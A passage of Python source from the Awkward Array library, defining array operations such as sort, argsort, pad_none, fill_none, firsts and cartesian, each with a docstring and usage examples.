>>> ak.to_list(ak.flatten(ak.flatten(multiindex)))
[(0, 0, 0),
(0, 0, 1),
(0, 0, 2),
(1, 0, 0),
(1, 0, 1),
(3, 0, 0),
(3, 2, 0),
(3, 2, 1),
(3, 2, 2),
(3, 2, 3)]
But if you're interested in Pandas, you may want to use #ak.to_pandas directly.
>>> ak.to_pandas(array)
values
entry subentry subsubentry
0 0 0 0.0
1 1.1
2 2.2
1 0 0 3.3
1 4.4
3 0 0 5.5
2 0 6.6
1 7.7
2 8.8
3 9.9
"""
layout = ak.operations.convert.to_layout(
array, allow_record=True, allow_other=False
)
out = layout.localindex(axis)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
@ak._connect._numpy.implements("sort")
def sort(array, axis=-1, ascending=True, stable=True, highlevel=True, behavior=None):
"""
Args:
array: Data to sort, possibly within nested lists.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
ascending (bool): If True, the first value in each sorted group
will be smallest, the last value largest; if False, the order
is from largest to smallest.
stable (bool): If True, use a stable sorting algorithm (introsort:
a hybrid of quicksort, heapsort, and insertion sort); if False,
use a sorting algorithm that is not guaranteed to be stable
(heapsort).
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
For example,
>>> ak.sort(ak.Array([[7, 5, 7], [], [2], [8, 2]]))
<Array [[5, 7, 7], [], [2], [2, 8]] type='4 * var * int64'>
"""
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
out = layout.sort(axis, ascending, stable)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
@ak._connect._numpy.implements("argsort")
def argsort(array, axis=-1, ascending=True, stable=True, highlevel=True, behavior=None):
"""
Args:
array: Data for which to get a sorting index, possibly within nested
lists.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
ascending (bool): If True, the first value in each sorted group
will be smallest, the last value largest; if False, the order
is from largest to smallest.
stable (bool): If True, use a stable sorting algorithm (introsort:
a hybrid of quicksort, heapsort, and insertion sort); if False,
use a sorting algorithm that is not guaranteed to be stable
(heapsort).
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
For example,
>>> ak.argsort(ak.Array([[7.7, 5.5, 7.7], [], [2.2], [8.8, 2.2]]))
<Array [[1, 0, 2], [], [0], [1, 0]] type='4 * var * int64'>
The result of this function can be used to index other arrays with the
same shape:
>>> data = ak.Array([[7, 5, 7], [], [2], [8, 2]])
>>> index = ak.argsort(index)
>>> index
<Array [[1, 0, 2], [], [0], [1, 0]] type='4 * var * int64'>
>>> data[index]
<Array [[5, 7, 7], [], [2], [2, 8]] type='4 * var * int64'>
"""
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
out = layout.argsort(axis, ascending, stable)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def pad_none(array, target, axis=1, clip=False, highlevel=True, behavior=None):
"""
Args:
array: Data containing nested lists to pad to a target length.
target (int): The intended length of the lists. If `clip=True`,
the output lists will have exactly this length; otherwise,
they will have *at least* this length.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
clip (bool): If True, the output lists will have regular lengths
(#ak.types.RegularType) of exactly `target`; otherwise the
output lists will have in-principle variable lengths
(#ak.types.ListType) of at least `target`.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Increase the lengths of lists to a target length by adding None values.
Consider the following doubly nested `array`.
ak.Array([[
[1.1, 2.2, 3.3],
[],
[4.4, 5.5],
[6.6]],
[],
[
[7.7],
[8.8, 9.9]
]])
At `axis=0`, this operation pads the whole array, adding None at the
outermost level:
>>> ak.to_list(ak.pad_none(array, 5, axis=0))
[[
[1.1, 2.2, 3.3],
[],
[4.4, 5.5],
[6.6]],
[],
[
[7.7],
[8.8, 9.9]
],
None,
None]
At `axis=1`, this operation pads the first nested level:
>>> ak.to_list(ak.pad_none(array, 3, axis=1))
[[
[1.1, 2.2, 3.3],
[],
[4.4, 5.5],
[6.6]
],
[
None,
None,
None],
[
[7.7],
[8.8, 9.9],
None
]]
And so on for higher values of `axis`:
>>> ak.to_list(ak.pad_none(array, 2, axis=2))
[[
[1.1, 2.2, 3.3],
[None, None],
[4.4, 5.5],
[6.6, None]
],
[],
[
[7.7, None],
[8.8, 9.9]
]]
Note that the `clip` parameter not only determines whether the lengths are
at least `target` or exactly `target`, it also determines the type of the
output:
* `clip=True` returns regular lists (#ak.types.RegularType), and
* `clip=False` returns in-principle variable lengths
(#ak.types.ListType).
The in-principle variable-length lists might, in fact, all have the same
length, but the type difference is significant, for instance in
broadcasting rules (see #ak.broadcast_arrays).
The difference between
>>> ak.pad_none(array, 2, axis=2)
<Array [[[1.1, 2.2, 3.3], ... [8.8, 9.9]]] type='3 * var * var * ?float64'>
and
>>> ak.pad_none(array, 2, axis=2, clip=True)
<Array [[[1.1, 2.2], [None, ... [8.8, 9.9]]] type='3 * var * 2 * ?float64'>
is not just in the length of `[1.1, 2.2, 3.3]` vs `[1.1, 2.2]`, but also
in the distinction between the following types.
>>> ak.type(ak.pad_none(array, 2, axis=2))
3 * var * var * ?float64
>>> ak.type(ak.pad_none(array, 2, axis=2, clip=True))
3 * var * 2 * ?float64
"""
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
if clip:
out = layout.rpad_and_clip(target, axis)
else:
out = layout.rpad(target, axis)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
# TODO: remove in 1.7.0!
def _fill_none_deprecated(array, value, highlevel=True, behavior=None):
arraylayout = ak.operations.convert.to_layout(
array, allow_record=True, allow_other=False
)
nplike = ak.nplike.of(arraylayout)
if isinstance(arraylayout, ak.partition.PartitionedArray):
out = ak.partition.apply(
lambda x: _fill_none_deprecated(x, value, highlevel=False), arraylayout
)
else:
if (
isinstance(value, Iterable)
and not (
isinstance(value, (str, bytes))
or (ak._util.py27 and isinstance(value, ak._util.unicode))
)
or isinstance(value, (ak.highlevel.Record, ak.layout.Record))
):
valuelayout = ak.operations.convert.to_layout(
value, allow_record=True, allow_other=False
)
if isinstance(valuelayout, ak.layout.Record):
valuelayout = valuelayout.array[valuelayout.at : valuelayout.at + 1]
elif len(valuelayout) == 0:
offsets = ak.layout.Index64(nplike.array([0, 0], dtype=np.int64))
valuelayout = ak.layout.ListOffsetArray64(offsets, valuelayout)
else:
valuelayout = ak.layout.RegularArray(valuelayout, len(valuelayout), 1)
else:
valuelayout = ak.operations.convert.to_layout(
[value], allow_record=False, allow_other=False
)
out = arraylayout.fillna(valuelayout)
if highlevel:
return ak._util.wrap(out, ak._util.behaviorof(array, behavior=behavior))
else:
return out
def fill_none(array, value, axis=ak._util.MISSING, highlevel=True, behavior=None):
"""
Args:
array: Data in which to replace None with a given value.
value: Data with which to replace None.
axis (None or int): If None, replace all None values in the array
with the given value; if an int, The dimension at which this
operation is applied. The outermost dimension is `0`, followed
by `1`, etc., and negative values count backward from the
innermost: `-1` is the innermost dimension, `-2` is the next
level up, etc.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Replaces missing values (None) with a given `value`.
For example, in the following `array`,
ak.Array([[1.1, None, 2.2], [], [None, 3.3, 4.4]])
The None values could be replaced with `0` by
>>> ak.fill_none(array, 0)
<Array [[1.1, 0, 2.2], [], [0, 3.3, 4.4]] type='3 * var * float64'>
The replacement value doesn't strictly need the same type as the
surrounding data. For example, the None values could also be replaced
by a string.
>>> ak.fill_none(array, "hi")
<Array [[1.1, 'hi', 2.2], ... ['hi', 3.3, 4.4]] type='3 * var * union[float64, s...'>
The list content now has a union type:
>>> ak.type(ak.fill_none(array, "hi"))
3 * var * union[float64, string]
The values could be floating-point numbers or strings.
"""
arraylayout = ak.operations.convert.to_layout(
array, allow_record=True, allow_other=False
)
nplike = ak.nplike.of(arraylayout)
# Add a condition for the "old" behaviour
if axis is ak._util.MISSING:
if isinstance(arraylayout, ak.layout.Record):
mindepth, maxdepth = arraylayout.array.minmax_depth
else:
mindepth, maxdepth = arraylayout.minmax_depth
if mindepth == maxdepth == 1:
axis = 0
else:
ak._util.deprecate(
"ak.fill_none needs an explicit `axis` because the default will change to `axis=-1`",
"1.7.0",
date="2021-10-01",
will_be="changed",
)
return _fill_none_deprecated(
array, value, highlevel=highlevel, behavior=behavior
)
# Convert value type to appropriate layout
if isinstance(value, (bool, numbers.Number, np.bool_, np.number)) or (
isinstance(value, np.ndarray)
and issubclass(value.dtype.type, (np.bool_, np.number))
):
valuelayout = ak.operations.convert.to_layout(
nplike.asarray(value), allow_record=False, allow_other=False
)
elif (
isinstance(value, Iterable)
and not (
isinstance(value, (str, bytes))
or (ak._util.py27 and isinstance(value, ak._util.unicode))
)
or isinstance(value, (ak.highlevel.Record, ak.layout.Record))
):
valuelayout = ak.operations.convert.to_layout(
value, allow_record=True, allow_other=False
)
if isinstance(valuelayout, ak.layout.Record):
valuelayout = valuelayout.array[valuelayout.at : valuelayout.at + 1]
elif len(valuelayout) == 0:
offsets = ak.layout.Index64(nplike.array([0, 0], dtype=np.int64))
valuelayout = ak.layout.ListOffsetArray64(offsets, valuelayout)
else:
valuelayout = ak.layout.RegularArray(valuelayout, len(valuelayout), 1)
else:
valuelayout = ak.operations.convert.to_layout(
[value], allow_record=False, allow_other=False
)
def maybe_fillna(layout):
if isinstance(layout, ak._util.optiontypes):
return layout.fillna(valuelayout)
else:
return layout
if axis is None:
def transform(layout, depth, posaxis):
return ak._util.transform_child_layouts(
transform, maybe_fillna(layout), depth, posaxis
)
else:
def transform(layout, depth, posaxis):
posaxis = layout.axis_wrap_if_negative(posaxis)
if posaxis + 1 < depth:
return layout
if posaxis + 1 == depth:
layout = maybe_fillna(layout)
return ak._util.transform_child_layouts(transform, layout, depth, posaxis)
out = transform(arraylayout, 1, axis)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def is_none(array, axis=0, highlevel=True, behavior=None):
"""
Args:
array: Data to check for missing values (None).
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns an array whose value is True where an element of `array` is None;
False otherwise (at a given `axis` depth).
"""
def getfunction(layout, depth, posaxis):
posaxis = layout.axis_wrap_if_negative(posaxis)
if posaxis == depth - 1:
nplike = ak.nplike.of(layout)
if isinstance(layout, ak._util.optiontypes):
return lambda: ak.layout.NumpyArray(
nplike.asarray(layout.bytemask()).view(np.bool_)
)
elif isinstance(
layout,
(
ak._util.unknowntypes,
ak._util.listtypes,
ak._util.recordtypes,
ak.layout.NumpyArray,
),
):
return lambda: ak.layout.NumpyArray(
nplike.zeros(len(layout), dtype=np.bool_)
)
else:
return posaxis
else:
return posaxis
layout = ak.operations.convert.to_layout(array)
out = ak._util.recursively_apply(
layout, getfunction, pass_depth=True, pass_user=True, user=axis
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def singletons(array, highlevel=True, behavior=None):
"""
Args:
array: Data to wrap in lists of length 1 if present and length 0
if missing (None).
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns a singleton list (length 1) wrapping each non-missing value and
an empty list (length 0) in place of each missing value.
For example,
>>> array = ak.Array([1.1, 2.2, None, 3.3, None, None, 4.4, 5.5])
>>> print(ak.singletons(array))
[[1.1], [2.2], [], [3.3], [], [], [4.4], [5.5]]
See #ak.firsts to invert this function.
"""
def getfunction(layout):
nplike = ak.nplike.of(layout)
if isinstance(layout, ak._util.optiontypes):
nulls = nplike.asarray(layout.bytemask()).view(np.bool_)
offsets = nplike.ones(len(layout) + 1, dtype=np.int64)
offsets[0] = 0
offsets[1:][nulls] = 0
nplike.cumsum(offsets, out=offsets)
return lambda: ak.layout.ListOffsetArray64(
ak.layout.Index64(offsets), layout.project()
)
else:
return None
layout = ak.operations.convert.to_layout(array)
out = ak._util.recursively_apply(layout, getfunction, pass_depth=False)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def firsts(array, axis=1, highlevel=True, behavior=None):
"""
Args:
array: Data from which to select the first elements from nested lists.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Selects the first element of each non-empty list and inserts None for each
empty list.
For example,
>>> array = ak.Array([[1.1], [2.2], [], [3.3], [], [], [4.4], [5.5]])
>>> print(ak.firsts(array))
[1.1, 2.2, None, 3.3, None, None, 4.4, 5.5]
See #ak.singletons to invert this function.
"""
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
if isinstance(layout, ak.partition.PartitionedArray):
posaxis = None
for x in layout.partitions:
if posaxis is None:
posaxis = x.axis_wrap_if_negative(axis)
elif posaxis != x.axis_wrap_if_negative(axis):
raise ValueError(
"ak.firsts for partitions with different axis depths"
+ ak._util.exception_suffix(__file__)
)
else:
posaxis = layout.axis_wrap_if_negative(axis)
if posaxis == 0:
if len(layout) == 0:
out = None
else:
out = layout[0]
else:
if posaxis < 0:
raise NotImplementedError(
"ak.firsts with ambiguous negative axis"
+ ak._util.exception_suffix(__file__)
)
toslice = (slice(None, None, None),) * posaxis + (0,)
out = ak.mask(layout, ak.num(layout, axis=posaxis) > 0, highlevel=False)[
toslice
]
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def cartesian(
arrays,
axis=1,
nested=None,
parameters=None,
with_name=None,
highlevel=True,
behavior=None,
):
"""
Args:
arrays (dict or iterable of arrays): Arrays on which to compute the
Cartesian product.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
nested (None, True, False, or iterable of str or int): If None or
False, all combinations of elements from the `arrays` are
produced at the same level of nesting; if True, they are grouped
in nested lists by combinations that share a common item from
each of the `arrays`; if an iterable of str or int, group common
items for a chosen set of keys from the `array` dict or integer
slots of the `array` iterable.
parameters (None or dict): Parameters for the new
#ak.layout.RecordArray node that is created by this operation.
with_name (None or str): Assigns a `"__record__"` name to the new
#ak.layout.RecordArray node that is created by this operation
(overriding `parameters`, if necessary).
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Computes a Cartesian product (i.e. cross product) of data from a set of
`arrays`. This operation creates records (if `arrays` is a dict) or tuples
(if `arrays` is another kind of iterable) that hold the combinations
of elements, and it can introduce new levels of nesting.
As a simple example with `axis=0`, the Cartesian product of
>>> one = ak.Array([1, 2, 3])
>>> two = ak.Array(["a", "b"])
is
>>> ak.to_list(ak.cartesian([one, two], axis=0))
[(1, 'a'), (1, 'b'), (2, 'a'), (2, 'b'), (3, 'a'), (3, 'b')]
With nesting, a new level of nested lists is created to group combinations
that share the same element from `one` into the same list.
>>> ak.to_list(ak.cartesian([one, two], axis=0, nested=True))
[[(1, 'a'), (1, 'b')], [(2, 'a'), (2, 'b')], [(3, 'a'), (3, 'b')]]
The primary purpose of this function, however, is to compute a different
Cartesian product for each element of an array: in other words, `axis=1`.
The following arrays each have four elements.
>>> one = ak.Array([[1, 2, 3], [], [4, 5], [6]])
>>> two = ak.Array([["a", "b"], ["c"], ["d"], ["e", "f"]])
The default `axis=1` produces 6 pairs from the Cartesian product of
`[1, 2, 3]` and `["a", "b"]`, 0 pairs from `[]` and `["c"]`, 1 pair from
`[4, 5]` and `["d"]`, and 1 pair from `[6]` and `["e", "f"]`.
>>> ak.to_list(ak.cartesian([one, two]))
[[(1, 'a'), (1, 'b'), (2, 'a'), (2, 'b'), (3, 'a'), (3, 'b')],
[],
[(4, 'd'), (5, 'd')],
[(6, 'e'), (6, 'f')]]
The nesting depth is the same as the original arrays; with `nested=True`,
the nesting depth is increased by 1 and tuples are grouped by their
first element.
>>> ak.to_list(ak.cartesian([one, two], nested=True))
[[[(1, 'a'), (1, 'b')], [(2, 'a'), (2, 'b')], [(3, 'a'), (3, 'b')]],
[],
[[(4, 'd')], [(5, 'd')]],
[[(6, 'e'), (6, 'f')]]]
These tuples are #ak.layout.RecordArray nodes with unnamed fields. To
name the fields, we can pass `one` and `two` in a dict, rather than a list.
>>> ak.to_list(ak.cartesian({"x": one, "y": two}))
[
[{'x': 1, 'y': 'a'},
{'x': 1, 'y': 'b'},
{'x': 2, 'y': 'a'},
{'x': 2, 'y': 'b'},
{'x': 3, 'y': 'a'},
{'x': 3, 'y': 'b'}],
[],
[{'x': 4, 'y': 'd'},
{'x': 5, 'y': 'd'}],
[{'x': 6, 'y': 'e'},
{'x': 6, 'y': 'f'}]
]
With more than two elements in the Cartesian product, `nested` can specify
which are grouped and which are not. For example,
>>> one = ak.Array([1, 2, 3, 4])
>>> two = ak.Array([1.1, 2.2, 3.3])
>>> three = ak.Array(["a", "b"])
can be left entirely ungrouped:
>>> ak.to_list(ak.cartesian([one, two, three], axis=0))
[
(1, 1.1, 'a'),
(1, 1.1, 'b'),
(1, 2.2, 'a'),
(1, 2.2, 'b'),
(1, 3.3, 'a'),
(1, 3.3, 'b'),
(2, 1.1, 'a'),
(2, 1.1, 'b'),
(2, 2.2, 'a'),
(2, 2.2, 'b'),
(2, 3.3, 'a'),
(2, 3.3, 'b'),
(3, 1.1, 'a'),
(3, 1.1, 'b'),
(3, 2.2, 'a'),
(3, 2.2, 'b'),
(3, 3.3, 'a'),
(3, 3.3, 'b'),
(4, 1.1, 'a'),
(4, 1.1, 'b'),
(4, 2.2, 'a'),
(4, 2.2, 'b'),
(4, 3.3, 'a'),
(4, 3.3, 'b')
]
can be grouped by `one` (adding 1 more dimension):
>>> ak.to_list(ak.cartesian([one, two, three], axis=0, nested=[0]))
[
[(1, 1.1, 'a'), (1, 1.1, 'b'), (1, 2.2, 'a')],
[(1, 2.2, 'b'), (1, 3.3, 'a'), (1, 3.3, 'b')],
[(2, 1.1, 'a'), (2, 1.1, 'b'), (2, 2.2, 'a')],
[(2, 2.2, 'b'), (2, 3.3, 'a'), (2, 3.3, 'b')],
[(3, 1.1, 'a'), (3, 1.1, 'b'), (3, 2.2, 'a')],
[(3, 2.2, 'b'), (3, 3.3, 'a'), (3, 3.3, 'b')],
[(4, 1.1, 'a'), (4, 1.1, 'b'), (4, 2.2, 'a')],
[(4, 2.2, 'b'), (4, 3.3, 'a'), (4, 3.3, 'b')]
]
can be grouped by `one` and `two` (adding 2 more dimensions):
>>> ak.to_list(ak.cartesian([one, two, three], axis=0, nested=[0, 1]))
[
[
[(1, 1.1, 'a'), (1, 1.1, 'b')],
[(1, 2.2, 'a'), (1, 2.2, 'b')],
[(1, 3.3, 'a'), (1, 3.3, 'b')]
],
[
[(2, 1.1, 'a'), (2, 1.1, 'b')],
[(2, 2.2, 'a'), (2, 2.2, 'b')],
[(2, 3.3, 'a'), (2, 3.3, 'b')]
],
[
[(3, 1.1, 'a'), (3, 1.1, 'b')],
[(3, 2.2, 'a'), (3, 2.2, 'b')],
[(3, 3.3, 'a'), (3, 3.3, 'b')]],
[
[(4, 1.1, 'a'), (4, 1.1, 'b')],
[(4, 2.2, 'a'), (4, 2.2, 'b')],
[(4, 3.3, 'a'), (4, 3.3, 'b')]]
]
or grouped by unique `one`-`two` pairs (adding 1 more dimension):
>>> ak.to_list(ak.cartesian([one, two, three], axis=0, nested=[1]))
[
[(1, 1.1, 'a'), (1, 1.1, 'b')],
[(1, 2.2, 'a'), (1, 2.2, 'b')],
[(1, 3.3, 'a'), (1, 3.3, 'b')],
[(2, 1.1, 'a'), (2, 1.1, 'b')],
[(2, 2.2, 'a'), (2, 2.2, 'b')],
[(2, 3.3, 'a'), (2, 3.3, 'b')],
[(3, 1.1, 'a'), (3, 1.1, 'b')],
[(3, 2.2, 'a'), (3, 2.2, 'b')],
[(3, 3.3, 'a'), (3, 3.3, 'b')],
[(4, 1.1, 'a'), (4, 1.1, 'b')],
[(4, 2.2, 'a'), (4, 2.2, 'b')],
[(4, 3.3, 'a'), (4, 3.3, 'b')]
]
The order of the output is fixed: it is always lexicographical in the
order that the `arrays` are written. (Before Python 3.6, the order of
keys in a dict were not guaranteed, so the dict interface is not
recommended for these versions of Python.) Thus, it is not possible to
group by `three` in the example above.
To emulate an SQL or Pandas "group by" operation, put the keys that you
wish to group by *first* and use `nested=[0]` or `nested=[n]` to group by
unique n-tuples. If necessary, record keys can later be reordered with a
list of strings in #ak.Array.__getitem__.
To get list index positions in the tuples/records, rather than data from
the original `arrays`, use #ak.argcartesian instead of #ak.cartesian. The
#ak.argcartesian form can be particularly useful as nested indexing in
#ak.Array.__getitem__.
"""
is_partitioned = False
if isinstance(arrays, dict):
behavior = ak._util.behaviorof(*arrays.values(), behavior=behavior)
nplike = ak.nplike.of(*arrays.values())
new_arrays = {}
for n, x in arrays.items():
new_arrays[n] = ak.operations.convert.to_layout(
x, allow_record=False, allow_other=False
)
if isinstance(new_arrays[n], ak.partition.PartitionedArray):
is_partitioned = True
else:
behavior = ak._util.behaviorof(*arrays, behavior=behavior)
nplike = ak.nplike.of(*arrays)
new_arrays = []
for x in arrays:
new_arrays.append(
ak.operations.convert.to_layout(
x, allow_record=False, allow_other=False
)
)
if isinstance(new_arrays[-1], ak.partition.PartitionedArray):
is_partitioned = True
if with_name is not None:
if parameters is None:
parameters = {}
else:
parameters = dict(parameters)
parameters["__record__"] = with_name
if isinstance(new_arrays, dict):
new_arrays_values = list(new_arrays.values())
else:
new_arrays_values = new_arrays
posaxis = new_arrays_values[0].axis_wrap_if_negative(axis)
if posaxis < 0:
raise ValueError(
"negative axis depth is ambiguous" + ak._util.exception_suffix(__file__)
)
for x in new_arrays_values[1:]:
if x.axis_wrap_if_negative(axis) != posaxis:
raise ValueError(
"arrays to cartesian-product do not have the same depth for "
"negative axis" + ak._util.exception_suffix(__file__)
)
if posaxis == 0:
if nested is None or nested is False:
nested = []
if isinstance(new_arrays, dict):
if nested is True:
nested = list(new_arrays.keys()) # last key is ignored below
if any(not (isinstance(n, str) and n in new_arrays) for x in nested):
raise ValueError(
"the 'nested' parameter of cartesian must be dict keys "
"for a dict of arrays" + ak._util.exception_suffix(__file__)
)
recordlookup = []
layouts = []
tonested = []
for i, (n, x) in enumerate(new_arrays.items()):
recordlookup.append(n)
layouts.append(x)
if n in nested:
tonested.append(i)
nested = tonested
else:
if nested is True:
nested = list(range(len(new_arrays) - 1))
if any(
not (isinstance(x, int) and 0 <= x < len(new_arrays) - 1)
for x in nested
):
raise ValueError(
"the 'nested' prarmeter of cartesian must be integers in "
"[0, len(arrays) - 1) for an iterable of arrays"
+ ak._util.exception_suffix(__file__)
)
recordlookup = None
layouts = []
for x in new_arrays:
layouts.append(x)
layouts = [
x.toContent() if isinstance(x, ak.partition.PartitionedArray) else x
for x in layouts
]
indexes = [
ak.layout.Index64(x.reshape(-1))
for x in nplike.meshgrid(
*[nplike.arange(len(x), dtype=np.int64) for x in layouts], indexing="ij"
)
]
outs = [
ak.layout.IndexedArray64(x, y)
for x, y in __builtins__["zip"](indexes, layouts)
]
result = ak.layout.RecordArray(outs, recordlookup, parameters=parameters)
for i in range(len(new_arrays) - 1, -1, -1):
if i in nested:
result = ak.layout.RegularArray(result, len(layouts[i + 1]), 0)
elif is_partitioned:
sample = None
if isinstance(new_arrays, dict):
for x in new_arrays.values():
if isinstance(x, ak.partition.PartitionedArray):
sample = x
break
else:
for x in new_arrays:
if isinstance(x, ak.partition.PartitionedArray):
sample = x
break
partition_arrays = ak.partition.partition_as(sample, new_arrays)
output = []
for part_arrays in ak.partition.iterate(sample.numpartitions, partition_arrays):
output.append(
cartesian(
part_arrays,
axis=axis,
nested=nested,
parameters=parameters,
with_name=None, # already set: see above
highlevel=False,
)
)
result = ak.partition.IrregularlyPartitionedArray(output)
else:
def newaxis(layout, i):
if i == 0:
return layout
else:
return ak.layout.RegularArray(newaxis(layout, i - 1), 1, 0)
def getgetfunction1(i):
def getfunction1(layout, depth):
if depth == 2:
return lambda: newaxis(layout, i)
else:
return None
return getfunction1
def getgetfunction2(i):
def getfunction2(layout, depth):
if depth == posaxis:
inside = len(new_arrays) - i - 1
outside = i
if (
layout.parameter("__array__") == "string"
or layout.parameter("__array__") == "bytestring"
):
raise ValueError(
"ak.cartesian does not compute combinations of the "
"characters of a string; please split it into lists"
+ ak._util.exception_suffix(__file__)
)
nextlayout = ak._util.recursively_apply(
layout, getgetfunction1(inside), pass_depth=True
)
return lambda: newaxis(nextlayout, outside)
else:
return None
return getfunction2
def apply(x, i):
layout = ak.operations.convert.to_layout(
x, allow_record=False, allow_other=False
)
return ak._util.recursively_apply(
layout, getgetfunction2(i), pass_depth=True
)
toflatten = []
if nested is None or nested is False:
nested = []
if isinstance(new_arrays, dict):
if nested is True:
nested = list(new_arrays.keys()) # last key is ignored below
if any(not (isinstance(n, str) and n in new_arrays) for x in nested):
raise ValueError(
"the 'nested' parameter of cartesian must be dict keys "
"for a dict of arrays" + ak._util.exception_suffix(__file__)
)
recordlookup = []
layouts = []
for i, (n, x) in enumerate(new_arrays.items()):
recordlookup.append(n)
layouts.append(apply(x, i))
if i < len(new_arrays) - 1 and n not in nested:
toflatten.append(posaxis + i + 1)
else:
if nested is True:
nested = list(range(len(new_arrays) - 1))
if any(
not (isinstance(x, int) and 0 <= x < len(new_arrays) - 1)
for x in nested
):
raise ValueError(
"the 'nested' parameter of cartesian must be integers in "
"[0, len(arrays) - 1) for an iterable of arrays"
+ ak._util.exception_suffix(__file__)
)
recordlookup = None
layouts = []
for i, x in enumerate(new_arrays):
layouts.append(apply(x, i))
if i < len(new_arrays) - 1 and i not in nested:
toflatten.append(posaxis + i + 1)
def getfunction3(inputs, depth):
if depth == posaxis + len(new_arrays):
if all(len(x) == 0 for x in inputs):
inputs = [
x.content
if isinstance(x, ak.layout.RegularArray) and x.size == 1
else x
for x in inputs
]
return lambda: (
ak.layout.RecordArray(inputs, recordlookup, parameters=parameters),
)
else:
return None
out = ak._util.broadcast_and_apply(
layouts, getfunction3, behavior, right_broadcast=False, pass_depth=True
)
assert isinstance(out, tuple) and len(out) == 1
result = out[0]
while len(toflatten) != 0:
flatten_axis = toflatten.pop()
result = flatten(result, axis=flatten_axis, highlevel=False)
return ak._util.maybe_wrap(result, behavior, highlevel)
def argcartesian(
arrays,
axis=1,
nested=None,
parameters=None,
with_name=None,
highlevel=True,
behavior=None,
):
"""
Args:
arrays (dict or iterable of arrays): Arrays on which to compute the
Cartesian product.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
nested (None, True, False, or iterable of str or int): If None or
False, all combinations of elements from the `arrays` are
produced at the same level of nesting; if True, they are grouped
in nested lists by combinations that share a common item from
each of the `arrays`; if an iterable of str or int, group common
items for a chosen set of keys from the `array` dict or slots
of the `array` iterable.
parameters (None or dict): Parameters for the new
#ak.layout.RecordArray node that is created by this operation.
with_name (None or str): Assigns a `"__record__"` name to the new
#ak.layout.RecordArray node that is created by this operation
(overriding `parameters`, if necessary).
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Computes a Cartesian product (i.e. cross product) of data from a set of
`arrays`, like #ak.cartesian, but returning integer indexes for
#ak.Array.__getitem__.
For example, the Cartesian product of
>>> one = ak.Array([1.1, 2.2, 3.3])
>>> two = ak.Array(["a", "b"])
is
>>> ak.to_list(ak.cartesian([one, two], axis=0))
[(1.1, 'a'), (1.1, 'b'), (2.2, 'a'), (2.2, 'b'), (3.3, 'a'), (3.3, 'b')]
But with argcartesian, only the indexes are returned.
>>> ak.to_list(ak.argcartesian([one, two], axis=0))
[(0, 0), (0, 1), (1, 0), (1, 1), (2, 0), (2, 1)]
These are the indexes that can select the items that go into the actual
Cartesian product.
>>> one_index, two_index = ak.unzip(ak.argcartesian([one, two], axis=0))
>>> one[one_index]
<Array [1.1, 1.1, 2.2, 2.2, 3.3, 3.3] type='6 * float64'>
>>> two[two_index]
<Array ['a', 'b', 'a', 'b', 'a', 'b'] type='6 * string'>
All of the parameters for #ak.cartesian apply equally to #ak.argcartesian,
so see the #ak.cartesian documentation for a more complete description.
"""
if axis < 0:
raise ValueError(
"the 'axis' of argcartesian must be non-negative"
+ ak._util.exception_suffix(__file__)
)
else:
if isinstance(arrays, dict):
behavior = ak._util.behaviorof(*arrays.values(), behavior=behavior)
layouts = dict(
(
n,
ak.operations.convert.to_layout(
x, allow_record=False, allow_other=False
).localindex(axis),
)
for n, x in arrays.items()
)
else:
behavior = ak._util.behaviorof(*arrays, behavior=behavior)
layouts = [
ak.operations.convert.to_layout(
x, allow_record=False, allow_other=False
).localindex(axis)
for x in arrays
]
if with_name is not None:
